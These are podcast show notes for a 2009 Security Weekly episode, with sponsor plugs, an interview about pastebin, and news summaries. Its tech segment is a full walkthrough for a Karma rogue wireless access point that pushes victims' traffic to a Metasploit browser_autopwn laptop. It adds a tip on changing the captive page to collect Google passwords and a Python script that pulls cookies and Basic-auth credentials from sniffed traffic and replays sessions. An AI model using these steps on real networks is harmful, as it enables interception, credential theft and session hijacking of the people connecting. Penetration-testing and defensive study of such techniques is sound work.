Episode 173

From Paul's Security Weekly


Sponsors

  • Tenable Network Security - This episode is sponsored by Tenable Network Security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the world's best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the world's best penetration testing tool.
  • Trustwave SpiderLabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Shameless Plugs & General Announcements

Security Weekly - Episode 173 - For Thursday October 29th, 2009

  • We are growing mustaches for Movember! Go to http://securityweekly.com/mo for more information and to make donations to our team; the proceeds benefit cancer research.
  • Syngress Publishing - Quench your thirst for knowledge at syngress.com and use the referral link or the discount code "Security Weekly" at checkout to save 20% on all security book titles!
  • Defensive Intuition - We are also sponsored by Defensive Intuition. Defensive Intuition is the provider of many security consulting services: penetration testing, physical assessments, and social engineering. Defensive Intuition: Owning your boxes, 7 ways to Sunday!
  • Phreaknic 13 - Get your Phreak on! Oct. 30-31st in Nashville, TN! Billy Hoffman among others presenting...
  • 10 PRINT "GOTO DOJOCON November 6-7
  • GOTO 10
  • Hackfest Canada! - Mick will be speaking/ranting from the Great White North! November 7th, you'll want to be there! Quebec, Canada (This con is so cool it's happening in two languages!)
  • Community SANS: Sec 542 Web Application Penetration Testing - SANS is pleased to announce Community SANS Providence, running January 11 - 16. Larry will teach Security 542: Web Application Penetration Testing and Ethical Hacking. The course will be hosted by Brown University. Also coming up, 617 in Calgary sometime in March!

Episode Media

mp3 pt 1

mp3 pt 2

Interview: Anthony Jacobin and BarCrawl

About

Anthony Jacobin

Home schooled from the 6th grade through high school, Anthony graduated from community college at the tender age of 16 (yes, graduated). He then went to college and finished his degree with stints in France and Sweden.

Pastebin and Bar Crawl

As we've all heard about the Hotmail password leak on pastebin, the actual uses for pastebin are being blurred. It's intended for collaborative code debugging, but as we have seen, pastebin is being used for some weird stuff. My friends over at http://www.pastebinfail.com are documenting some of the weird, funny and odd posts. Some of these posts can be useful to us in the security field. One example of this is the exploit category over at pastebinfail, http://www.pastebinfail.com/search/label/exploit. 0-days and private exploits can be reversed to prevent use in the wild and create patches. As pen-testers, without good tools our hands get a bit stressed; how about a nice little keylogger? http://www.pastebinfail.com/2009/09/nice-little-keylogger.html. I haven't compiled and played with this yet; what are the chances of this thing getting past signature-based AV? And we can all use a laugh, right? Base64 decode this and pop it into a PNG ... bam ... you've got an owl! http://www.pastebinfail.com/2009/07/base64-encode-png-of-owl.html

Pastebin doesn't last forever, or else the site search would be used a lot more. I'm working on a crawler so that you can archive various posts of interest and check them out on your own time. One objective is to not piss off Paul Dixon (the owner of Pastebin), so my goal is to only use the same amount of bandwidth that you would from trolling the recent posts. My crawler isn't that far off from being released, but when it is, it will be released as BarCrawl at http://www.hackingeurope.com, my site and security + random blog.

Questions

Tech Segment: Pwnage with the LaFonera Pt II

In part one we talked about setting up the LaFonera with Jasager; now let's use it!

First off, let's do a little security on our LaFonera. While attached to the same LAN, and assuming our LaFonera is on 192.168.1.1, first telnet to the device. It will let you in without a password, and we need to set one:

passwd

Once a password is set, telnet will be disabled and only the web interface and SSH will be available. Now we need to SSH back to the device:

ssh root@192.168.1.1

In addition, the web interface for Jasager will now require a username and password: root, and the password you just defined. Good, now we can feel a little safer.

Now to tune our Jasager install. By default, the pwnage doesn't start automatically; it requires some clicks in the web interface after logging in. That is a problem if we hide the device somewhere and power is lost and reapplied. We'll use the built-in uci command in OpenWRT to make the wireless interface come up on startup:

root@OpenWrt:/# uci set wireless.wifi0.disabled=0
root@OpenWrt:/# uci commit wireless && wifi

By default, Jasager stands up a wireless network to bait people with, in addition to the Karma functionality. That network is labeled "OpenWRT", but we can do better for baiting wireless clients. Let's change it by editing /etc/config/wireless on the LaFonera; change the following line to reflect the SSID of our choosing:

option ssid    FreeWireless

Let's also make sure that Karma itself starts at power on. For that we need a startup script, /etc/init.d/jasager. On OpenWRT a script under /etc/init.d only runs at boot when it follows the /etc/rc.common convention (a start() function plus a START order number) and has been enabled, so write it like this:

#!/bin/sh /etc/rc.common
START=99
start() {
	wlanconfig ath0 create wlandev wifi0 wlanmode master
	iwpriv ath0 karma 1
}

In addition, if you are using this in an environment with known good wireless networks that you don't want to Karma (such as corporate networks, or your home network), add those networks to the start() function of the startup script as well, one line per SSID:

iwpriv ath0 addkarmassid "myhomenet"

Don't forget to make the startup script executable and to enable it (enable creates the /etc/rc.d symlink that actually runs it at boot; check with ls /etc/rc.d that an S99jasager entry appeared):

chmod +x /etc/init.d/jasager && /etc/init.d/jasager enable

To set up some of the later attacks, we want to define DHCP options on the LaFonera so that when users get Karma'd and obtain an IP address from our router, their default gateway (option 3) and DNS server (option 6) point at a laptop attached to the LaFonera (we'll set this up momentarily). The dnsmasq settings live in /etc/config/dhcp (UCI files carry no .conf suffix); add the following to its lan section:

option 'dhcp_option' 'lan,3,192.168.1.2'
option 'dhcp_option' 'lan,6,192.168.1.2'

This assumes that the laptop we set up has the IP address 192.168.1.2. Restart dnsmasq (or reboot the LaFonera) so the new options are handed out, then check: take a lease on a test client and confirm that both its router and its DNS server are 192.168.1.2. If only one of the two shows up, your dnsmasq init script treats dhcp_option as a list (later OpenWRT releases do), and both lines need to be written with the list keyword instead of option.

Metasploit

Remember that laptop we talked about? Let's get it configured. I'm using Ubuntu 9.04 for this one, so the commands below reflect that. First we need to install a few dependencies for Metasploit:

sudo apt-get install sqlite3 libsqlite3-dev libsqlite3-ruby subversion

Now we can install Metasploit, but we'll use the version from SVN:

svn checkout http://metasploit.com/svn/framework3/trunk/ ~/msf

We also need the Karma resource file for Metasploit, which we place in the ~/msf directory:

cd ~/msf
wget http://metasploit.com/users/hdm/tools/karma.rc

In addition, for this to work we need to update karma.rc for our own addresses. The beginning of the file should look like this:

db_driver sqlite3
db_create /tmp/karma.db

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST 192.168.1.2
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST 192.168.1.2
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

This points karma.rc at our Metasploit installation on 192.168.1.2, and updates the database commands so that the SQLite driver is loaded.

On a final note, when folks get pwned by our Karma and Metasploit installation and browse the web, Metasploit serves them a web page. It isn't very convincing, so we can replace it with a new one. The page lives under the Metasploit checkout; the wget below saves the paste as index.html, so check that what you fetched is the raw HTML and not pastebin's page wrapper around it:

cd ~/msf/data/exploits/capture/http
mv index.html index.html.old
wget -O index.html http://pastebin.com/f178811cd

Alternatively, we could even modify the new page with some additional evil. One we like at Security Weekly is to claim that the portal is tied to the user's Google account: add a username and password field to the form, and you harvest Google credentials without any other heavy lifting.

With our LaFonera tied to our Metasploit box, let's make sure that we have our IP address set on the Ubuntu installation:

sudo ifconfig eth0 inet 192.168.1.2


Now, let's fire off our Metasploit instance for ownage. Once it is running, Jasager answers every wireless probe, the LaFonera assigns an IP address with our Metasploit laptop as router and DNS, and every web request lands on the laptop, where browser_autopwn is used to force the acquisition of cookies. Run msfconsole from the checkout directory:

cd ~/msf
sudo ./msfconsole -r karma.rc

When ownage has occurred, we can view the results in the Metasploit console with:

db_notes

Sidejack

While we are at it, let's grab even more credentials and be able to use them for sessions. This is useful for obtaining credentials for apps that Metasploit's browser_autopwn doesn't know about, such as internal resources while engaged in a pentest.

We can use an awesome pair of tools on our Ubuntu box, Ferret and Hamster, that sniff HTTP traffic, capture cookies, and set up a local proxy so that we can clone the session.

First we need to do the install via a download and compile:

sudo apt-get install libpcap-dev build-essential
wget http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z
tar xzf hamster-2.0.0.tar.z
cd ~/hamster/build/gcc4
make
cd ~/ferret/build/gcc4
make

We do need to do a bit of post compilation configuration so that all the bits and pieces are in the correct place:

cp ~/ferret/bin/ferret ~/hamster/bin/

In another terminal, we need to start Hamster:

cd ~/hamster/bin/
sudo ./hamster

Now, fire up Firefox on your Ubuntu box and define an HTTP proxy (Preferences | Advanced | Network | Settings) at 127.0.0.1 on port 1234. Once added, point your browser to http://127.0.0.1:1234. In the Hamster web interface, click Adapters and tell it about the interface that is receiving our victims' requests, usually eth0. Once Hamster is being populated, and with the proxy in place, you should be able to clone user sessions from the captured cookies. Keep in mind that this only works for sessions carried over plain HTTP: a cookie flagged Secure is sent only over HTTPS and never crosses the wire in the clear.
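To make concrete what Ferret and Hamster do with the traffic our Karma'd clients push through the laptop, here is an added example (it is not code from the show notes, nor from Errata Security's tools): it parses raw HTTP requests as they would be sniffed on eth0, pulls out the session material a sidejacker needs (Host plus Cookie, and any Basic auth header), and builds the replay request Hamster's proxy would send when you clone a session. The capture is constructed for the example, and the function and class names are this example's own, not Hamster's or Ferret's API.

```python
"""Sidejacking in miniature: harvest session material from captured HTTP
requests and rebuild a request that reuses it.

Added example for these show notes; it is not Ferret or Hamster code. The
capture below is constructed by hand, and every name here is this example's
own, not an API of either tool.
"""
import base64
from dataclasses import dataclass, field
from typing import Dict, Iterator, List, Optional, Tuple

# Constructed sample of what a sniffer on the laptop sees once Karma'd clients
# route their cleartext HTTP through it. The final fragment is deliberately
# truncated, as a capture that ends mid-request would be.
_BASIC = base64.b64encode(b"jdoe:Winter2009").decode("ascii")
CAPTURE = (
    "GET /mail/ HTTP/1.1\r\n"
    "Host: webmail.example.test\r\n"
    "Cookie: SID=a1b2c3; lang=en\r\n"
    "\r\n"
    "GET /inbox HTTP/1.1\r\n"
    "Host: webmail.example.test\r\n"
    "Cookie: SID=a1b2c3; lang=en; view=compact\r\n"
    "\r\n"
    "GET /intranet/ HTTP/1.1\r\n"
    "Host: wiki.corp.test\r\n"
    f"Authorization: Basic {_BASIC}\r\n"
    "\r\n"
    "POST /login HTTP/1.1\r\n"
    "Host: wiki.corp.test\r\n"
    "Content-Length: 5\r\n"
    "\r\n"
    "hello"
    "GET /\r\n"
).encode("latin-1")


@dataclass
class Session:
    host: str
    cookies: Dict[str, str] = field(default_factory=dict)
    basic_auth: Optional[str] = None      # decoded user:pass, if one was sent
    paths: List[str] = field(default_factory=list)


def parse_requests(raw: bytes) -> Iterator[Tuple[str, str, Dict[str, str], bytes]]:
    """Yield (method, path, headers, body) for each HTTP/1.x request in raw.

    Honours Content-Length so a POST body is not mistaken for the next
    request, and stops cleanly at a truncated tail.
    """
    pos = 0
    while pos < len(raw):
        end = raw.find(b"\r\n\r\n", pos)
        if end == -1:
            break                                  # incomplete request: drop it
        lines = raw[pos:end].decode("latin-1").split("\r\n")
        parts = lines[0].split(" ")
        if len(parts) != 3:                        # not a request line: skip block
            pos = end + 4
            continue
        method, path, _version = parts
        headers: Dict[str, str] = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        try:
            length = int(headers.get("content-length", "0"))
        except ValueError:
            length = 0
        body = raw[end + 4:end + 4 + length]
        pos = end + 4 + length
        yield method, path, headers, body


def harvest_sessions(raw: bytes) -> Dict[str, Session]:
    """Ferret's job: collect per-host cookies and credentials from requests."""
    sessions: Dict[str, Session] = {}
    for _method, path, headers, _body in parse_requests(raw):
        host = headers.get("host")
        if not host:
            continue
        sess = sessions.setdefault(host, Session(host=host))
        sess.paths.append(path)
        for crumb in headers.get("cookie", "").split(";"):
            name, sep, value = crumb.strip().partition("=")
            if sep:
                sess.cookies[name] = value         # later requests refresh values
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            try:
                sess.basic_auth = base64.b64decode(auth[6:]).decode("latin-1")
            except ValueError:                     # garbage token: keep going
                pass
    return sessions


def clone_request(sess: Session, path: str) -> bytes:
    """Hamster's job: replay the victim's session material on a fresh request."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {sess.host}"]
    if sess.cookies:
        lines.append("Cookie: " + "; ".join(f"{k}={v}" for k, v in sess.cookies.items()))
    if sess.basic_auth:
        token = base64.b64encode(sess.basic_auth.encode("latin-1")).decode("ascii")
        lines.append(f"Authorization: Basic {token}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


if __name__ == "__main__":
    found = harvest_sessions(CAPTURE)
    for host, sess in found.items():
        print(host, sess.cookies, sess.basic_auth, sess.paths)
    print(clone_request(found["webmail.example.test"], "/inbox").decode("latin-1"))
```

The point the example makes is the same one Hamster makes in its UI: nothing in a plain-HTTP session ties the cookie to the client that earned it, so whoever sees the Cookie header owns the session until the server expires it. The truncated fragment and the POST body are there because a real sniffer feed is never tidy; a parser that resynchronises on the next blank line, rather than crashing, is what keeps the session table filling up during an engagement.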

This will of course require our network to have some sort of valid uplink to the internet, or to the corporate network in which we are testing. We'd need another Ethernet interface on our laptop to connect, or a cell connection for the internet. I'll leave setting up these additional connections as an exercise for the reader, but setting up my cell connection on Ubuntu was painless with help from a quick Google search.

A word of advice: you will need to allow IP forwarding through your Ubuntu box. The redirect has to run as root (a bare sudo in front of echo would not apply to the redirect), so:

sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

Forwarding alone only routes the packets. For the victims to actually get anywhere through the uplink, their 192.168.1.0/24 addresses also have to be NATed (masqueraded) onto the uplink interface with iptables; otherwise nothing comes back to them and the Karma'd clients see a dead network.

I have to give huge thanks to Ax0n from HiR for his series of posts on Jasager installation and integration, on which this segment was based.


Stories For Discussion

  1. Why should you let users browse the Internet? - This is one concept that makes even the best and brightest defenders in our field crumble and hide in shame. Why on earth would you let all of the client systems, which have access to the most sensitive data in the organization, access the entire internet? Of course, there must be a clear-cut, business-related reason to allow this activity to occur, right? If you dig deep down, I bet there isn't such a reason in a good number of our organizations. I truly believe we need to re-think how we do client security, and access to the internet is a big factor. If I look at the cost of monitoring internet traffic, including the devices and processes involved, the time of human resources to deal with the fallout, constant reporting to management on web browsing, and wasted employee time on non-work related sites, is it all worth it? When you can buy a computer for $150, why not create two networks, one with internet access and one without? Of course this wouldn't work for all organizations, but it is in use by the government with great success, right? Okay, maybe the Joint Strike Fighter plans are an example of this not working, but no defensive measure is perfect.
  2. Former anti-virus researcher turns tables on industry - [Paul] - This story is just crazy! We had Peter on the show in episode 155, when he was working for an anti-virus company. Now the tables have been turned and he created a site called A/V Tracker, http://avtracker.info/, which lists the services and sites that people are uploading malware to, including IP addresses. Peter says that it's easy for malware to figure out that it's being scanned by one of these services and self-destruct, or even better/worse, pwn the system it's being analyzed on (I'm certain they have protections against this, but as we all know, protections can be defeated.).
  3. Social Engineering in Real-World Computer Attacks - [Paul] - This is a great article by Lenny Zeltser which covers the ways in which you can use social engineering to hack stuff. For example, parking tickets left on people's cars that tell them to visit a web site, VoIP accounts used to ask people to call their banks, and malware infecting USB keys. The last one is particularly interesting, as you have a virtual threat that manages to manifest itself in the real world (like The Matrix, or the opposite of Tron ;). I think we will see more of these attacks, as attacks that use real-world elements are often more successful.
  4. Bejtlich's Book Reviews - Richard is recommending two books on web application security, SQL Injection Attacks and Defense and The Web Application Hacker's Handbook. Go read them :)
  5. Don't Be The Smelly Kid - [Paul] - This is a great analogy by Bugbear: security is like good hygiene, you have to keep up with it, so don't be the smelly kid. And don't think you're getting away with covering up your stench with cologne, because you still smell, so take a real shower, and do it on a regular basis. Go to the doctor too, that's kinda like a penetration test, wait, did I just go there?
  6. One For The N00bs - [Paul] - In so many ways, high school sucks. There are all these rules, and kids in high school are all about crowds and who you hang with and sit with in the cafeteria. Kinda like the security scene, where some only let certain folks sit at the table. Well, like Dave and others, our table is open to anyone, unless of course you smell, in which case you can shower and come back when you don't smell. But my point is, I won't go to the prom with you. No, really, the point is don't be a dick and refuse to teach people stuff because they are a n00b.
  7. Louisville Infosec Videos Are Up - [Paul] - See me and John Strand present (separately). We're okay I guess :)
  8. Random Password Generator - [Paul] - Pretty neat command to generate a random password, which I highly recommend. Also, check out Hal's write-up on the Command Line Kung Fu blog. He really does have way too much time on his hands!

Other Stories Of Interest